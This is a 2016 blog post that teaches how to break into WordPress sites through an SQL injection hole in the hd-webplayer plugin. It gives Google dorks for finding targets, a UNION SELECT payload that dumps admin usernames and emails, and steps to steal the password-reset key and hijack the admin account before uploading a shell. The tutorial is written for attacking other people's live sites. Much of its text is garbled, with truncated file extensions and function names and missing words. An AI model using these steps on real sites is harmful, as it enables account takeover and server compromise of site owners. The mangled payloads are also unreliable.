Wednesday, May 18, 2016
HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING
HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING
First of all we need to find a vulnerable page.
We enter this in Google:
:
# Dork 1 (config.p)
inurl:"/wp-content/plugins/hd-webplayer/config.p?id="
# Dork 2 (playlist.p)
inurl:"/wp-content/plugins/hd-webplayer/playlist.p?id="
# Dork 3 (eral):
inurl:"/wp-content/plugins/hd-webplayer/"
When you found your site you need to find admin email and username.
I will be using this site for example:
:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=3
When i add ' text disapprs so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
:
http://www.site.com/wp-login.p
And press "Lost your ?"
Now you enter either username or email.
We can enter both so it doesn't matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It mns that reset is successfully sent.
Now we need to get the .
Go back to the syntax you used for extracting email and username and do this:
:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
:
wp-login.p?action=rp&=reset&login=username
NOTE: Replace = & login=
So my link will be:
Enter new :
Login with new and shell it.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment